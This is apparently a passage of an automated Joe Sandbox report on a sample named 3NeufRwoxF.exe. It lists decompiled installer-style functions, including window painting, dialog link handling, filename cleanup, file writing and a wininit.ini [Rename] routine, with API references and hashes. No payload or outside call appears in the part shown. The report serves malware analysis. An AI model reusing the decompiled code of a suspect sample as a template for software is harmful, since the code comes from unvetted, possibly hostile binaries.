						_t52 = GetDlgItem(_a4, 0x3e8);
						_t110 = _a16;
						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
							_t109 =  *((intOrPtr*)(_t110 + 0x18));
							_v12 = _t100;
							_v16 = _t109;
							_v8 = 0x422e40;
							if(_t100 - _t109 < 0x800) {
								SendMessageA(_t52, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorA(0, 0x7f02));
								_t40 =  &_v8; // 0x422e40
								ShellExecuteA(_a4, "open",  *_t40, 0, 0, 1);
								SetCursor(LoadCursorA(0, 0x7f00));
								_t110 = _a16;
							}
						}
						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
							goto L26;
						} else {
							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
								SendMessageA( *0x423ea8, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
								SendMessageA( *0x423ea8, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x420478 != 0) {
						goto L25;
					} else {
						_t103 =  *0x41fc68; // 0x0
						_t25 = _t103 + 0x14; // 0x14
						_t112 = _t25;
						if(( *_t112 & 0x00000020) == 0) {
							goto L25;
						}
						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E00403E59(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E0040420A();
						goto L11;
					}
				}
				_t98 = _a16;
				_t113 =  *(_t98 + 0x30);
				if(_t113 < 0) {
					_t113 =  *( *0x42367c - 4 + _t113 * 4);
				}
				_push( *((intOrPtr*)(_t98 + 0x34)));
				_t114 = _t113 +  *0x423ed8;
				_push(0x22);
				_a16 =  *_t114;
				_v12 = _v12 & 0x00000000;
				_t115 = _t114 + 1;
				_v16 = _t115;
				_v8 = E00403F4B;
				E00403E37(_a4);
				_push( *((intOrPtr*)(_t98 + 0x38)));
				_push(0x23);
				E00403E37(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E00403E59( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
				_t99 = GetDlgItem(_a4, 0x3e8);
				E00403E6C(_t99);
				SendMessageA(_t99, 0x45b, 1, 0);
				_t86 =  *( *0x423eb0 + 0x68);
				if(_t86 < 0) {
					_t86 = GetSysColor( ~_t86);
				}
				SendMessageA(_t99, 0x443, 0, _t86);
				SendMessageA(_t99, 0x445, 0, 0x4010000);
				 *0x41f45c =  *0x41f45c & 0x00000000;
				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
				SendMessageA(_t99, 0x449, _a16,  &_v16);
				 *0x420478 =  *0x420478 & 0x00000000;
				return 0;
			}

0x00403f8f
0x004040b5
0x00404111
0x00404115
0x004041ec
0x004041ee
0x004041ee
0x004041f4
0x004041f4
0x004041f7
0x00000000
0x004041fe
0x00404123
0x00404125
0x0040412f
0x0040413a
0x0040413d
0x00404140
0x0040414b
0x0040414e
0x00404155
0x00404163
0x0040417b
0x00404183
0x0040418e
0x0040419e
0x004041a0
0x004041a0
0x00404155
0x004041aa
0x00000000
0x004041b5
0x004041b9
0x004041ca
0x004041ca
0x004041d0
0x004041de
0x004041de
0x00000000
0x004041e2
0x004041aa
0x004040c0
0x00000000
0x004040d4
0x004040d4
0x004040da
0x004040da
0x004040e0
0x00000000
0x00000000
0x00404105
0x00404107
0x0040410c
0x00000000
0x0040410c
0x004040c0
0x00403f95
0x00403f98
0x00403f9d
0x00403fae
0x00403fae
0x00403fb5
0x00403fb8
0x00403fba
0x00403fbf
0x00403fc8
0x00403fce
0x00403fda
0x00403fdd
0x00403fe6
0x00403feb
0x00403fee
0x00403ff3
0x0040400a
0x00404011
0x00404024
0x00404027
0x0040403c
0x00404043
0x00404048
0x0040404d
0x0040404d
0x0040405c
0x0040406b
0x0040406d
0x00404083
0x00404092
0x00404094
0x00000000

APIs

CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 0040400A
GetDlgItem.USER32 ref: 0040401E
SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 0040403C
GetSysColor.USER32(?), ref: 0040404D
SendMessageA.USER32(00000000,00000443,00000000,?), ref: 0040405C
SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 0040406B
lstrlenA.KERNEL32(?), ref: 00404075
SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00404083
SendMessageA.USER32(00000000,00000449,?,00000110), ref: 00404092
GetDlgItem.USER32 ref: 004040F5
SendMessageA.USER32(00000000), ref: 004040F8
GetDlgItem.USER32 ref: 00404123
SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 00404163
LoadCursorA.USER32 ref: 00404172
SetCursor.USER32(00000000), ref: 0040417B
ShellExecuteA.SHELL32(0000070B,open,@.B,00000000,00000000,00000001), ref: 0040418E
LoadCursorA.USER32 ref: 0040419B
SetCursor.USER32(00000000), ref: 0040419E
SendMessageA.USER32(00000111,00000001,00000000), ref: 004041CA
SendMessageA.USER32(00000010,00000000,00000000), ref: 004041DE

Strings

@.B, xrefs: 00404183
open, xrefs: 00404186
N, xrefs: 00404111

Memory Dump Source

Source File: 00000000.00000002.655618767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.655607705.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.655678725.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.655695462.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655746163.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655768064.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655776920.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3NeufRwoxF.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
String ID: @.B$N$open
API String ID: 3615053054-3815657624
Opcode ID: 086c9584272f405e5d23a234cb3672cb38a546f38c26fc4f0f37582571ec5c76
Instruction ID: c3de460066171d4a99b3db8707b5a70307f179c1ca483427b8a670d92431fbf8
Opcode Fuzzy Hash: 086c9584272f405e5d23a234cb3672cb38a546f38c26fc4f0f37582571ec5c76
Instruction Fuzzy Hash: 4E61C3B1A40209BFEB109F60CC45B6A7B69FB54715F108136FB04BA2D1C7B8A951CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 00401000, Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x423eb0;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextA(_t128, 0x4236a0, 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x423ea8;
				}
				return DefWindowProcA(_a4, _a8, _a12, _t102);
			}

0x0040100a
0x00401039
0x00401047
0x0040104d
0x00401051
0x0040105b
0x00401061
0x00401064
0x004010f3
0x00401089
0x0040108c
0x004010a6
0x004010bd
0x004010cc
0x004010cf
0x004010d5
0x004010d9
0x004010e4
0x004010ed
0x004010ef
0x004010ef
0x00401100
0x00401105
0x0040110d
0x00401110
0x00401112
0x00401118
0x0040111f
0x00401126
0x00401130
0x00401142
0x00401156
0x00401160
0x00401165
0x00401165
0x00401110
0x0040116e
0x00000000
0x00401178
0x00401010
0x00401013
0x00401015
0x0040101f
0x0040101f
0x00000000

APIs

DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32 ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32 ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectA.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextA.USER32(00000000,004236A0,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.655618767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.655607705.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.655678725.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.655695462.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655746163.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655768064.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655776920.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3NeufRwoxF.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: 1fa3053a276be56ef7da5d68adfba1d9971bfb9fa2beb597bf2db4fb963a824d
Instruction ID: 81477e3a2fde3fb3f26aa953fc06e347994717d76cab2c79682594c458f31f57
Opcode Fuzzy Hash: 1fa3053a276be56ef7da5d68adfba1d9971bfb9fa2beb597bf2db4fb963a824d
Instruction Fuzzy Hash: 8141BC71804249AFCB058FA4CD459BFBFB9FF44314F00802AF551AA1A0C378EA54DFA5

Uniqueness

Uniqueness Score: -1.00%

Function 004057D3, Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 144
filememoryCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E004057D3() {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t15;
				long _t16;
				int _t20;
				void* _t28;
				long _t29;
				intOrPtr* _t37;
				int _t43;
				void* _t44;
				long _t47;
				CHAR* _t49;
				void* _t51;
				void* _t53;
				intOrPtr* _t54;
				void* _t55;
				void* _t56;

				_t15 = E00405DA3(1);
				_t49 =  *(_t55 + 0x18);
				if(_t15 != 0) {
					_t20 =  *_t15( *(_t55 + 0x1c), _t49, 5);
					if(_t20 != 0) {
						L16:
						 *0x423f30 =  *0x423f30 + 1;
						return _t20;
					}
				}
				 *0x422628 = 0x4c554e;
				if(_t49 == 0) {
					L5:
					_t16 = GetShortPathNameA( *(_t55 + 0x1c), 0x4220a0, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						_t43 = wsprintfA(0x421ca0, "%s=%s\r\n", 0x422628, 0x4220a0);
						_t56 = _t55 + 0x10;
						E00405AA7(_t43, 0x400, 0x4220a0, 0x4220a0,  *((intOrPtr*)( *0x423eb0 + 0x128)));
						_t20 = E0040575C(0x4220a0, 0xc0000000, 4);
						_t53 = _t20;
						 *(_t56 + 0x14) = _t53;
						if(_t53 == 0xffffffff) {
							goto L16;
						}
						_t47 = GetFileSize(_t53, 0);
						_t7 = _t43 + 0xa; // 0xa
						_t51 = GlobalAlloc(0x40, _t47 + _t7);
						if(_t51 == 0 || ReadFile(_t53, _t51, _t47, _t56 + 0x18, 0) == 0 || _t47 !=  *(_t56 + 0x18)) {
							L15:
							_t20 = CloseHandle(_t53);
							goto L16;
						} else {
							if(E004056D1(_t51, "[Rename]\r\n") != 0) {
								_t28 = E004056D1(_t26 + 0xa, 0x409348);
								if(_t28 == 0) {
									L13:
									_t29 = _t47;
									L14:
									E0040571D(_t51 + _t29, 0x421ca0, _t43);
									SetFilePointer(_t53, 0, 0, 0);
									WriteFile(_t53, _t51, _t47 + _t43, _t56 + 0x18, 0);
									GlobalFree(_t51);
									goto L15;
								}
								_t37 = _t28 + 1;
								_t44 = _t51 + _t47;
								_t54 = _t37;
								if(_t37 >= _t44) {
									L21:
									_t53 =  *(_t56 + 0x14);
									_t29 = _t37 - _t51;
									goto L14;
								} else {
									goto L20;
								}
								do {
									L20:
									 *((char*)(_t43 + _t54)) =  *_t54;
									_t54 = _t54 + 1;
								} while (_t54 < _t44);
								goto L21;
							}
							E00405A85(_t51 + _t47, "[Rename]\r\n");
							_t47 = _t47 + 0xa;
							goto L13;
						}
					}
				} else {
					CloseHandle(E0040575C(_t49, 0, 1));
					_t16 = GetShortPathNameA(_t49, 0x422628, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						goto L5;
					}
				}
				return _t16;
			}

0x004057d9
0x004057e0
0x004057e4
0x004057ed
0x004057f1
0x00405930
0x00405930
0x00000000
0x00405930
0x004057f1
0x004057fd
0x00405813
0x0040583b
0x00405846
0x0040584a
0x0040586a
0x00405871
0x0040587b
0x00405888
0x0040588d
0x00405892
0x00405896
0x00000000
0x00000000
0x004058a5
0x004058a7
0x004058b4
0x004058b8
0x00405929
0x0040592a
0x00000000
0x004058d4
0x004058e1
0x00405946
0x0040594d
0x004058f4
0x004058f4
0x004058f6
0x004058ff
0x0040590a
0x0040591c
0x00405923
0x00000000
0x00405923
0x0040594f
0x00405950
0x00405955
0x00405957
0x00405964
0x00405964
0x00405968
0x00000000
0x00000000
0x00000000
0x00000000
0x00405959
0x00405959
0x0040595c
0x0040595f
0x00405960
0x00000000
0x00405959
0x004058ec
0x004058f1
0x00000000
0x004058f1
0x004058b8
0x00405815
0x00405820
0x00405829
0x0040582d
0x00000000
0x00000000
0x0040582d
0x0040593a

APIs

Part of subcall function 00405DA3: GetModuleHandleA.KERNEL32(?,?,00000000,00403268,00000008), ref: 00405DB5
Part of subcall function 00405DA3: LoadLibraryA.KERNELBASE(?,?,00000000,00403268,00000008), ref: 00405DC0
Part of subcall function 00405DA3: GetProcAddress.KERNEL32(00000000,?), ref: 00405DD1

CloseHandle.KERNEL32(00000000,?,00000000,00000001,00000001,?,00000000,?,?,00405568,?,00000000,000000F1,?), ref: 00405820
GetShortPathNameA.KERNEL32(?,00422628,00000400), ref: 00405829
GetShortPathNameA.KERNEL32(00000000,004220A0,00000400), ref: 00405846
wsprintfA.USER32 ref: 00405864
GetFileSize.KERNEL32(00000000,00000000,004220A0,C0000000,00000004,004220A0,?,?,?,00000000,000000F1,?), ref: 0040589F
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 004058AE
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,000000F1,?), ref: 004058C4
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,00421CA0,00000000,-0000000A,00409348,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040590A
WriteFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,000000F1,?), ref: 0040591C
GlobalFree.KERNEL32 ref: 00405923
CloseHandle.KERNEL32(00000000,?,?,00000000,000000F1,?), ref: 0040592A

Part of subcall function 004056D1: lstrlenA.KERNEL32(00000000,?,00000000,00000000,004058DF,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004056D8
Part of subcall function 004056D1: lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,004058DF,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405708

Strings

%s=%s, xrefs: 0040585A
[Rename], xrefs: 004058D4, 004058E6
(&B, xrefs: 0040580E

Memory Dump Source

Source File: 00000000.00000002.655618767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.655607705.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.655678725.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.655695462.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655746163.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655768064.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655776920.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3NeufRwoxF.jbxd

Similarity

API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocFreeLibraryLoadModulePointerProcReadSizeWritewsprintf
String ID: %s=%s$(&B$[Rename]
API String ID: 3772915668-1834469719
Opcode ID: 59f55a9dc5d97f07b1302869ed359d77eb01a2f99cc6c2b796ec22a8fd90dab3
Instruction ID: f113039d6a8e0b98787bbcb52898fefdd985450d1919188b96c4478b1d7dfea3
Opcode Fuzzy Hash: 59f55a9dc5d97f07b1302869ed359d77eb01a2f99cc6c2b796ec22a8fd90dab3
Instruction Fuzzy Hash: 0F412371A00B11FBD3216B619D48FAB3A5CDB45764F100036FA05F22D2E678A801CEBD

Uniqueness

Uniqueness Score: -1.00%

Function 00405CE3, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405CE3(CHAR* _a4) {
				char _t5;
				char _t7;
				char* _t15;
				char* _t16;
				CHAR* _t17;

				_t17 = _a4;
				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
					_t17 =  &(_t17[4]);
				}
				if( *_t17 != 0 && E004055E5(_t17) != 0) {
					_t17 =  &(_t17[2]);
				}
				_t5 =  *_t17;
				_t15 = _t17;
				_t16 = _t17;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((char*)(E004055A3("*?|<>/\":", _t5))) == 0) {
							E0040571D(_t16, _t17, CharNextA(_t17) - _t17);
							_t16 = CharNextA(_t16);
						}
						_t17 = CharNextA(_t17);
						_t5 =  *_t17;
					} while (_t5 != 0);
				}
				 *_t16 =  *_t16 & 0x00000000;
				while(1) {
					_t16 = CharPrevA(_t15, _t16);
					_t7 =  *_t16;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t16 =  *_t16 & 0x00000000;
					if(_t15 < _t16) {
						continue;
					}
					break;
				}
				return _t7;
			}

0x00405ce5
0x00405ced
0x00405d01
0x00405d01
0x00405d07
0x00405d14
0x00405d14
0x00405d15
0x00405d17
0x00405d1b
0x00405d1d
0x00405d26
0x00405d28
0x00405d42
0x00405d4a
0x00405d4a
0x00405d4f
0x00405d51
0x00405d53
0x00405d57
0x00405d58
0x00405d5b
0x00405d63
0x00405d65
0x00405d69
0x00000000
0x00000000
0x00405d6f
0x00405d74
0x00000000
0x00000000
0x00000000
0x00405d74
0x00405d79

APIs

CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\3NeufRwoxF.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D3B
CharNextA.USER32(?,?,?,00000000), ref: 00405D48
CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\3NeufRwoxF.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D4D
CharPrevA.USER32(?,?,"C:\Users\user\Desktop\3NeufRwoxF.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D5D

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405CE4, 00405D1F
"C:\Users\user\Desktop\3NeufRwoxF.exe" , xrefs: 00405CE9
*?|<>/":, xrefs: 00405D2B

Memory Dump Source

Source File: 00000000.00000002.655618767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.655607705.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.655678725.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.655695462.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655746163.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655768064.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655776920.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3NeufRwoxF.jbxd

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\Desktop\3NeufRwoxF.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-1720415933
Opcode ID: 7ea15337aa65b78854fdfbf4a976c6e6ace2ef0f47433067a0fc10695a03ac80
Instruction ID: 2efc38d3d3d4567a91e012bcb7a73cc210910fb997772161a70c169f721ad970
Opcode Fuzzy Hash: 7ea15337aa65b78854fdfbf4a976c6e6ace2ef0f47433067a0fc10695a03ac80
Instruction Fuzzy Hash: 5811E251804B9129EB3226285C48B7B6F89CF97760F18807BE5C1722C2D67C5C429E6D

Uniqueness

Uniqueness Score: -1.00%

Function 00403E9E, Relevance: 12.1, APIs: 8, Instructions: 61
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403E9E(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t35;
				long _t37;
				void* _t40;
				long* _t49;

				if(_a4 + 0xfffffecd > 5) {
					L15:
					return 0;
				}
				_t49 = GetWindowLongA(_a12, 0xffffffeb);
				if(_t49 == 0) {
					goto L15;
				}
				_t35 =  *_t49;
				if((_t49[5] & 0x00000002) != 0) {
					_t35 = GetSysColor(_t35);
				}
				if((_t49[5] & 0x00000001) != 0) {
					SetTextColor(_a8, _t35);
				}
				SetBkMode(_a8, _t49[4]);
				_t37 = _t49[1];
				_v16.lbColor = _t37;
				if((_t49[5] & 0x00000008) != 0) {
					_t37 = GetSysColor(_t37);
					_v16.lbColor = _t37;
				}
				if((_t49[5] & 0x00000004) != 0) {
					SetBkColor(_a8, _t37);
				}
				if((_t49[5] & 0x00000010) != 0) {
					_v16.lbStyle = _t49[2];
					_t40 = _t49[3];
					if(_t40 != 0) {
						DeleteObject(_t40);
					}
					_t49[3] = CreateBrushIndirect( &_v16);
				}
				return _t49[3];
			}

0x00403eb0
0x00403f44
0x00000000
0x00403f44
0x00403ec1
0x00403ec5
0x00000000
0x00000000
0x00403ecb
0x00403ed4
0x00403ed7
0x00403ed7
0x00403edd
0x00403ee3
0x00403ee3
0x00403eef
0x00403ef5
0x00403efc
0x00403eff
0x00403f02
0x00403f04
0x00403f04
0x00403f0c
0x00403f12
0x00403f12
0x00403f1c
0x00403f21
0x00403f24
0x00403f29
0x00403f2c
0x00403f2c
0x00403f3c
0x00403f3c
0x00000000

APIs

GetWindowLongA.USER32 ref: 00403EBB
GetSysColor.USER32(00000000), ref: 00403ED7
SetTextColor.GDI32(?,00000000), ref: 00403EE3
SetBkMode.GDI32(?,?), ref: 00403EEF
GetSysColor.USER32(?), ref: 00403F02
SetBkColor.GDI32(?,?), ref: 00403F12
DeleteObject.GDI32(?), ref: 00403F2C
CreateBrushIndirect.GDI32(?), ref: 00403F36

Memory Dump Source

Source File: 00000000.00000002.655618767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.655607705.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.655678725.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.655695462.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655746163.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655768064.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655776920.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3NeufRwoxF.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: 54c4c26d0880f537c7164b4e2121e342b47f232b14c6c2566c024284623f766e
Instruction ID: 00f1469000c5a89127aeec98ef40b5380c975c6b17ce5fce2ee989e1a8c22914
Opcode Fuzzy Hash: 54c4c26d0880f537c7164b4e2121e342b47f232b14c6c2566c024284623f766e
Instruction Fuzzy Hash: D9216271904745ABCB219F68DD08B5BBFF8AF01715B048A69F895E22E1C738E9048B55

Uniqueness

Uniqueness Score: -1.00%

Function 0040266E, Relevance: 10.6, APIs: 7, Instructions: 89
memoryfileCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E0040266E(struct _OVERLAPPED* __ebx) {
				void* _t27;
				long _t32;
				struct _OVERLAPPED* _t47;
				void* _t51;
				void* _t53;
				void* _t56;
				void* _t57;
				void* _t58;

				_t47 = __ebx;
				 *(_t58 - 8) = 0xfffffd66;
				_t52 = E004029E8(0xfffffff0);
				 *(_t58 - 0x44) = _t24;
				if(E004055E5(_t52) == 0) {
					E004029E8(0xffffffed);
				}
				E0040573D(_t52);
				_t27 = E0040575C(_t52, 0x40000000, 2);
				 *(_t58 + 8) = _t27;
				if(_t27 != 0xffffffff) {
					_t32 =  *0x423eb4;
					 *(_t58 - 0x2c) = _t32;
					_t51 = GlobalAlloc(0x40, _t32);
					if(_t51 != _t47) {
						E004031DA(_t47);
						E004031A8(_t51,  *(_t58 - 0x2c));
						_t56 = GlobalAlloc(0x40,  *(_t58 - 0x1c));
						 *(_t58 - 0x30) = _t56;
						if(_t56 != _t47) {
							E00402F01(_t49,  *((intOrPtr*)(_t58 - 0x20)), _t47, _t56,  *(_t58 - 0x1c));
							while( *_t56 != _t47) {
								_t49 =  *_t56;
								_t57 = _t56 + 8;
								 *(_t58 - 0x38) =  *_t56;
								E0040571D( *((intOrPtr*)(_t56 + 4)) + _t51, _t57, _t49);
								_t56 = _t57 +  *(_t58 - 0x38);
							}
							GlobalFree( *(_t58 - 0x30));
						}
						WriteFile( *(_t58 + 8), _t51,  *(_t58 - 0x2c), _t58 - 8, _t47);
						GlobalFree(_t51);
						 *(_t58 - 8) = E00402F01(_t49, 0xffffffff,  *(_t58 + 8), _t47, _t47);
					}
					CloseHandle( *(_t58 + 8));
				}
				_t53 = 0xfffffff3;
				if( *(_t58 - 8) < _t47) {
					_t53 = 0xffffffef;
					DeleteFileA( *(_t58 - 0x44));
					 *((intOrPtr*)(_t58 - 4)) = 1;
				}
				_push(_t53);
				E00401423();
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t58 - 4));
				return 0;
			}

0x0040266e
0x00402670
0x0040267c
0x0040267f
0x00402689
0x0040268d
0x0040268d
0x00402693
0x004026a0
0x004026a8
0x004026ab
0x004026b1
0x004026bf
0x004026c4
0x004026c8
0x004026cb
0x004026d4
0x004026e0
0x004026e4
0x004026e7
0x004026f1
0x00402710
0x004026f8
0x004026fd
0x00402705
0x00402708
0x0040270d
0x0040270d
0x00402717
0x00402717
0x00402729
0x00402730
0x00402742
0x00402742
0x00402748
0x00402748
0x00402753
0x00402754
0x00402758
0x0040275c
0x00402762
0x00402762
0x00402769
0x00402156
0x00402880
0x0040288c

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 004026C2
GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,000000F0), ref: 004026DE
GlobalFree.KERNEL32 ref: 00402717
WriteFile.KERNEL32(FFFFFD66,00000000,?,FFFFFD66,?,?,?,?,000000F0), ref: 00402729
GlobalFree.KERNEL32 ref: 00402730
CloseHandle.KERNEL32(FFFFFD66,?,?,000000F0), ref: 00402748
DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 0040275C

Memory Dump Source

Source File: 00000000.00000002.655618767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.655607705.0000000000400000.00000002.00020000.sdmp Download File
